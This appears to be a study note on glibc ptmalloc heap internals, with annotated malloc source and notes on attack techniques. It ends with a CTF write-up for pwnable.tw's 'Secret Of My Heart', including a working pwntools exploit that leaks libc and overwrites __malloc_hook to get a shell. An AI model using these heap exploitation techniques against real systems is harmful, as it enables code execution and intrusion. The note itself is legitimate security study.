# HEAP 詳盡整理 # ptmalloc > ref https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/ https://paper.seebug.org/255/ https://ctf-wiki.github.io/ctf-wiki/pwn/heap/heap_implementation_details.html ## unlink * double-linked list check * `FD->bk == P && BK->fd == P` * *corrupted double-linked list* * `r = &r-0x18` ```C #define unlink(AV, P, BK, FD) { \ FD = P->fd; \ BK = P->bk; \ // for large chunk if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); \ else { \ FD->bk = BK; \ BK->fd = FD; \ if (!in_smallbin_range (P->size) \ && __builtin_expect (P->fd_nextsize != NULL, 0)) { \ if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \ || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \ malloc_printerr (check_action, \ "corrupted double-linked list (not small)", \ P, AV); \ // FD is not in size list if (FD->fd_nextsize == NULL) { \ // There're only P in the whole size list, then remove P and let FD be the new size list if (P->fd_nextsize == P) \ FD->fd_nextsize = FD->bk_nextsize = FD; \ // otherwise insert FD into the size list else { \ FD->fd_nextsize = P->fd_nextsize; \ FD->bk_nextsize = P->bk_nextsize; \ P->fd_nextsize->bk_nextsize = FD; \ P->bk_nextsize->fd_nextsize = FD; \ } \ } else { \ P->fd_nextsize->bk_nextsize = P->bk_nextsize; \ P->bk_nextsize->fd_nextsize = P->fd_nextsize; \ } \ } \ } \ } ``` ## _int_malloc > from `__libc_malloc` > > 1. check __malloc_hook > > 2. arena_get > > 3. **_int_malloc()** > > 4. if failed, retry with another arena --- * Convert request size to internal use (header, mask, alignment) * **fastbin attack** Ex: forge size `0x7?` would not fail and is the same as `0x70` ```C /* Convert request size to internal form by adding SIZE_SZ bytes overhead plus possibly more to obtain necessary alignment and/or to obtain a size of at least MINSIZE, the smallest allocatable size. Also, checked_request2size traps (returning 0) request sizes that are so large that they wrap around zero when padded and aligned. */ checked_request2size (bytes, nb); ---------------------------------------- /* Check if a request is so large that it would wrap around zero when padded and aligned. To simplify some other code, the bound is made low enough so that adding MINSIZE will also not wrap around zero. */ #define REQUEST_OUT_OF_RANGE(req) \ ((unsigned long) (req) >= \ (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE)) /* pad request bytes into a usable size -- internal version */ #define request2size(req) \ (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \ MINSIZE : \ ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) /* Same, except also perform argument check */ #define checked_request2size(req, sz) \ if (REQUEST_OUT_OF_RANGE (req)) { \ __set_errno (ENOMEM); \ return 0; \ } \ (sz) = request2size (req); ``` * No usable arena => `sysmalloc` ```C /* There are no usable arenas. Fall back to sysmalloc to get a chunk from mmap. */ if (__glibc_unlikely (av == NULL)) { void *p = sysmalloc (nb, av); if (p != NULL) alloc_perturb (p, bytes); return p; } ``` ### I. Is fastbin * Check if the size qualifies as a fastbin * **global_max_fast** * Find chunks in fast bin index corresponding to requiring size. * malloc_state.fastbinY[] * Check if index match chunk size * **unsigned int** * *malloc(): memory corruption (fast)* #### If found : return #### ELSE : go [IV. Unsorted bin](#IV-Unsorted-bin) ```C /* If the size qualifies as a fastbin, first check corresponding bin. This code is safe to execute even if av is not yet initialized, so we can try it without checking, which saves some time on this fast path. */ if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) { idx = fastbin_index (nb); mfastbinptr *fb = &fastbin (av, idx); mchunkptr pp = *fb; do { victim = pp; if (victim == NULL) break; } while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) != victim); if (victim != 0) { if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0)) { errstr = "malloc(): memory corruption (fast)"; errout: malloc_printerr (check_action, errstr, chunk2mem (victim), av); return NULL; } check_remalloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } } ``` ### II. Is small * Take the lastest one as victim * double linked list check * `bck->fd == victim` > just check one direction? * *malloc(): smallbin double linked list corrupted* * remove victim * `bin->bk = bck ; bck->fd = bin` #### If found : return #### ELSE : go [IV. Unsorted bin](#IV-Unsorted-bin) ```C /* If a small request, check regular bin. Since these "smallbins" hold one size each, no searching within bins is necessary. (For a large request, we need to wait until unsorted chunks are processed to find best fit. But for small ones, fits are exact anyway, so we can check now, which is faster.) */ if (in_smallbin_range (nb)) { idx = smallbin_index (nb); bin = bin_at (av, idx); if ((victim = last (bin)) != bin) { if (victim == 0) /* initialization check */ malloc_consolidate (av); else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) { errstr = "malloc(): smallbin double linked list corrupted"; goto errout; } set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin; if (av != &main_arena) victim->size |= NON_MAIN_ARENA; check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } } } ``` ### III. Is large * First consolidate free fastbins. #### III-I. go [IV. Unsorted bin](#IV-Unsorted-bin) #### III-II. Smallest fit * go to [V. Larger bin](#V-Larger-bin) if empty or the largest chunk is too small * scan through from the biggest order (`bk_nextsize`) to find smallest fit. * unlink * If remain size is enough to be a chunk after allocating, then set as last remainder. * check list * `fwd->bk == av` * *malloc(): corrupted unsorted chunks* ```C if (!in_smallbin_range (nb)) { bin = bin_at (av, idx); /* skip scan if empty or largest chunk is too small */ if ((victim = first (bin)) != bin && (unsigned long) (victim->size) >= (unsigned long) (nb)) { victim = victim->bk_nextsize; while (((unsigned long) (size = chunksize (victim)) < (unsigned long) (nb))) victim = victim->bk_nextsize; /* Avoid removing the first entry for a size so that the skip list does not have to be rerouted. */ if (victim != last (bin) && victim->size == victim->fd->size) victim = victim->fd; remainder_size = size - nb; unlink (av, victim, bck, fwd); /* Exhaust */ if (remainder_size < MINSIZE) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) victim->size |= NON_MAIN_ARENA; } /* Split */ else { remainder = chunk_at_offset (victim, nb); /* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */ bck = unsorted_chunks (av); fwd = bck->fd; if (__glibc_unlikely (fwd->bk != bck)) { errstr = "malloc(): corrupted unsorted chunks"; goto errout; } remainder->bk = bck; remainder->fd = fwd; bck->fd = remainder; fwd->bk = remainder; if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; } set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); set_foot (remainder, remainder_size); } check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } } ``` ### IV. Unsorted bin * size check * `victim->size > 2 * SIZE_SZ` `victim->size < system_mem` * *malloc(): memory corruption* --- #### IV-I. Last remainder (for small) * If a **small request**, try to use last remainder if it is the only chunk in unsorted bin and its size is enough. ```C if (in_smallbin_range (nb) && bck == unsorted_chunks (av) && victim == av->last_remainder && (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) { /* split and reattach remainder */ remainder_size = size - nb; remainder = chunk_at_offset (victim, nb); unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; av->last_remainder = remainder; remainder->bk = remainder->fd = unsorted_chunks (av); if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; } set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); set_foot (remainder, remainder_size); check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } ``` --- * Remove from unsorted bin * `av->bk = bck` `bck->fd = av;` * **No double-linked list check** * **unsorted bin attack** : write arbitrary with unsorted bin address (or a big number) #### IF exact fit * **return** * In **unsorted bin attack** we usually **request exact fit size** which prevents from processing broken bin. #### ELSE * place chunk into corresponding bin * small : backward * large : sorted order * fd, bk => same size * fd_nextsize, bk_nextsize => next size level ##### IF is large : go [III-II. Smallest fit](#III-II-Smallest-fit) ```C /* remove from unsorted list */ unsorted_chunks (av)->bk = bck; bck->fd = unsorted_chunks (av); /* Take now instead of binning if exact fit */ if (size == nb) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) victim->size |= NON_MAIN_ARENA; check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } /* place chunk in bin */ if (in_smallbin_range (size)) { victim_index = smallbin_index (size); bck = bin_at (av, victim_index); fwd = bck->fd; } else { victim_index = largebin_index (size); bck = bin_at (av, victim_index); fwd = bck->fd; /* maintain large bins in sorted order */ if (fwd != bck) { /* Or with inuse bit to speed comparisons */ size |= PREV_INUSE; /* if smaller than smallest, bypass loop below */ assert ((bck->bk->size & NON_MAIN_ARENA) == 0); if ((unsigned long) (size) < (unsigned long) (bck->bk->size)) { fwd = bck; bck = bck->bk; victim->fd_nextsize = fwd->fd; victim->bk_nextsize = fwd->fd->bk_nextsize; fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; } else { assert ((fwd->size & NON_MAIN_ARENA) == 0); while ((unsigned long) size < fwd->size) { fwd = fwd->fd_nextsize; assert ((fwd->size & NON_MAIN_ARENA) == 0); } if ((unsigned long) size == (unsigned long) fwd->size) /* Always insert in the second position. */ fwd = fwd->fd; else { victim->fd_nextsize = fwd; victim->bk_nextsize = fwd->bk_nextsize; fwd->bk_nextsize = victim; victim->bk_nextsize->fd_nextsize = victim; } bck = fwd->bk; } } else victim->fd_nextsize = victim->bk_nextsize = victim; } mark_bin (av, victim_index); victim->bk = bck; victim->fd = fwd; fwd->bk = victim; bck->fd = victim; ``` ### V. Larger bin * cannot find any chunk at the current bin, move to larger one. * check list * `bck = unsorted_chunks` `fwd->bk == bck` * *malloc(): corrupted unsorted chunks 2* ```C /* Search for a chunk by scanning bins, starting with next largest bin. This search is strictly by best-fit; i.e., the smallest (with ties going to approximately the least recently used) chunk that fits is selected. The bitmap avoids needing to check that most blocks are nonempty. The particular case of skipping all bins during warm-up phases when no chunks have been returned yet is faster than it might look. */ ++idx; bin = bin_at (av, idx); block = idx2block (idx); map = av->binmap[block]; bit = idx2bit (idx); for (;; ) { /* Skip rest of block if there are no more set bits in this block. */ if (bit > map || bit == 0) { do { if (++block >= BINMAPSIZE) /* out of bins */ goto use_top; } while ((map = av->binmap[block]) == 0); bin = bin_at (av, (block << BINMAPSHIFT)); bit = 1; } /* Advance to bin with set bit. There must be one. */ while ((bit & map) == 0) { bin = next_bin (bin); bit <<= 1; assert (bit != 0); } /* Inspect the bin. It is likely to be non-empty */ victim = last (bin); /* If a false alarm (empty bin), clear the bit. */ if (victim == bin) { av->binmap[block] = map &= ~bit; /* Write through */ bin = next_bin (bin); bit <<= 1; } else { size = chunksize (victim); /* We know the first chunk in this bin is big enough to use. */ assert ((unsigned long) (size) >= (unsigned long) (nb)); remainder_size = size - nb; /* unlink */ unlink (av, victim, bck, fwd); /* Exhaust */ if (remainder_size < MINSIZE) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) victim->size |= NON_MAIN_ARENA; } /* Split */ else { remainder = chunk_at_offset (victim, nb); /* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */ bck = unsorted_chunks (av); fwd = bck->fd; if (__glibc_unlikely (fwd->bk != bck)) { errstr = "malloc(): corrupted unsorted chunks 2"; goto errout; } remainder->bk = bck; remainder->fd = fwd; bck->fd = remainder; fwd->bk = remainder; /* advertise as last remainder */ if (in_smallbin_range (nb)) av->last_remainder = remainder; if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; } set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); set_foot (remainder, remainder_size); } check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } } ``` ### VI. Top * If large enough, split off the top chunk * `size >= nb + MINSIZE` * **House of Force** * `nb` can be **negative** * Otherwise it is replenished by `sysmalloc` ```C use_top: /* If large enough, split off the chunk bordering the end of memory (held in av->top). Note that this is in accord with the best-fit search rule. In effect, av->top is treated as larger (and thus less well fitting) than any other available chunk since it can be extended to be as large as necessary (up to system limitations). We require that av->top always exists (i.e., has size >= MINSIZE) after initialization, so if it would otherwise be exhausted by current request, it is replenished. (The main reason for ensuring it exists is that we may need MINSIZE space to put in fenceposts in sysmalloc.) */ victim = av->top; size = chunksize (victim); if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) { remainder_size = size - nb; remainder = chunk_at_offset (victim, nb); av->top = remainder; set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } /* When we are using atomic ops to free fast chunks we can get here for all block sizes. */ else if (have_fastchunks (av)) { malloc_consolidate (av); /* restore original bin index */ if (in_smallbin_range (nb)) idx = smallbin_index (nb); else idx = largebin_index (nb); } /* Otherwise, relay to handle system-dependent cases */ else { void *p = sysmalloc (nb, av); if (p != NULL) alloc_perturb (p, bytes); return p; } ``` ## _int_free TODO # CTF ## Secret Of My Heart [400 pts] - pwnable.tw * 解法 * 成功 * shrink heap => fast bin corruption 0x70 => overwrite __malloc_hook with one_gadget_rce * shrink heap => unsorted bin attack => set 0x7??? in front of __free_hook => fast bin corruption 0x70 => overwrite __free_hook with system (**without one_gadget_rce needed!!**) * 嘗試 * tls_dtor_list : 前方read-only * global_max_fast : 沒地方做fastbin attack * check_action : ..沒什麼用?? * 他人解法 * file stream * std * _IO_list_all (about abort routine) * ROP ### tls_dtor_list * `exit()` -> `__GI_exit()` -> `__run_exit_handlers()` -> `__GI___call_tls_dtors()` ```C // glibc/stdlib/cxa_thread_atexit_impl.c 78 typedef void (*dtor_func) (void *); 79 80 struct dtor_list 81 { 82 dtor_func func; 83 void *obj; 84 struct link_map *map; 85 struct dtor_list *next; 86 }; 87 88 static __thread struct dtor_list *tls_dtor_list; ... 141 /* Call the destructors. This is called either when a thread returns from the 142 initial function or when the process exits via the exit function. */ 143 void 144 __call_tls_dtors (void) 145 { 146 while (tls_dtor_list) 147 { 148 struct dtor_list *cur = tls_dtor_list; 149 dtor_func func = cur->func; 150 #ifdef PTR_DEMANGLE 151 PTR_DEMANGLE (func); 152 #endif 153 154 tls_dtor_list = tls_dtor_list->next; 155 func (cur->obj); 156 157 /* Ensure that the MAP dereference happens before 158 l_tls_dtor_count decrement. That way, we protect this access from a 159 potential DSO unload in _dl_close_worker, which happens when 160 l_tls_dtor_count is 0. See CONCURRENCY NOTES for more detail. */ 161 atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1); 162 free (cur); 163 } 164 } 165 libc_hidden_def (__call_tls_dtors) ``` --- * https://xianzhi.aliyun.com/forum/topic/1770 (stdin->_IO_base_end, malloc_hook) * [LCTF2017-2ez4u](https://bbs.pediy.com/thread-223283-1.htm) (large bins, fastbin attack, main_arena.top) * Project Zero * https://googleprojectzero.blogspot.tw/2014/08/the-poisoned-nul-byte-2014-edition.html * http://v0ids3curity.blogspot.tw/2015/02/revisiting-defcon-ctf-shitsco-use-after.html (check_action / large bin unlink) * [House of Orange](http://4ngelboy.blogspot.tw/2016/10/hitcon-ctf-qual-2016-house-of-orange.html) * [sol.py](https://github.com/ktecv2000/CTF_writeup/blob/master/pwnable.tw/Secret%20Of%20My%20Heart/sol.py) * I view some writeups from others and figure out that all these solution could be roughly classified as `one_gadget_rce` needed or not * But It seems more complicated if you don't use `one_gadget_rce` (like ROP on stack or vtable or something). * Overwrite `__malloc_hook` with `one_gadget_rce` is just about luck. * Nearby `&__free_hook` is all the fucking `0` so it seems impossible to do a simple fast bin attack to hijack it. * Then I come up with a good idea : * first do unsorted bin attack to write unsorted bin address `0x7?????` in front of `&__free_hook` * Then you can do fast bin attack with size `0x70` to hijack `__free_hook` ! ```python from pwn import * #p = process('./secret_of_my_heart') p = remote('chall.pwnable.tw',10302) e = ELF('./secret_of_my_heart') l = ELF('./libc_64.so.6') #l = ELF('/lib/x86_64-linux-gnu/libc.so.6') #gdb.attach(p) main_arena_offset = 0x3c3b20 #main_arena_offset = 0x39db00 def add(sz, name='A'*32, secret='1234'): p.sendafter('Your choice :', '1') p.sendafter('Size of heart :', str(sz)) p.sendafter('Name of heart :', name) p.sendafter('secret of my heart :', secret) def show(i): p.sendafter('Your choice :', '2') p.sendlineafter('Index :', str(i)) def delete(i): p.sendafter('Your choice :', '3') p.sendlineafter('Index :', str(i)) # shrink the heap to get overlap chunk add(0x20) add(0x100, secret = 'A'*0xf0 + p64(0x100)) add(0x100) #2 delete(1) delete(0) add(0x28, secret='A'*0x20 + p64(0)) #0, off-by-one NULL -> overwrite 1's size add(0x80) #1 add(0x10) #3 delete(1) delete(2) # leak libc : get two same chunks, free one and print the other add(0x80) #1 add(0x80, secret = 'B'*(0x60+8) + #3 (== 2) p64(0x21)) # to bypass `invalid next size (fast)` for later use add(0x80) #4 delete(3) # write fd, bk on chunk 3 (== 2) show(2) p.recvuntil('Secret : ') libc_addr = u64(p.recvline()[:-1].ljust(8, "\x00")) - (main_arena_offset + 0x58) log.info('Libc : ' + hex(libc_addr)) log.info('__malloc_hook : ' + hex(libc_addr + l.symbols['__malloc_hook'])) fake_chunk_to_hook = 0x1b + 8 fake_fd = libc_addr + (l.symbols['__malloc_hook'] - fake_chunk_to_hook) fake_size = 0x70 # 0x7? pass size check and classified as 0x70 fastbin system_addr = libc_addr + l.symbols['system'] # overwrite __malloc_hook with one_gadget_rce #rce_offset = [0x40beb, 0x40c3f, 0xd9935] rce_offset = [0x45216, 0x4526a, 0xef6c4, 0xf0567] # overwrite victim's size and free delete(1) add(0x100, secret = 'C'*(0x80+8) + p64(fake_size)) delete(2) # overwrite victim's fd delete(1) add(0x100, secret = 'C'*(0x80+8) + p64(fake_size) + p64(fake_fd)) # overwrite __malloc_hook add(fake_size - 0x10) add(fake_size - 0x10, secret = 'D'*(fake_chunk_to_hook - 0x10) + p64(libc_addr + rce_offset[2])) delete(3) # <- really lucky :) p.interactive() ```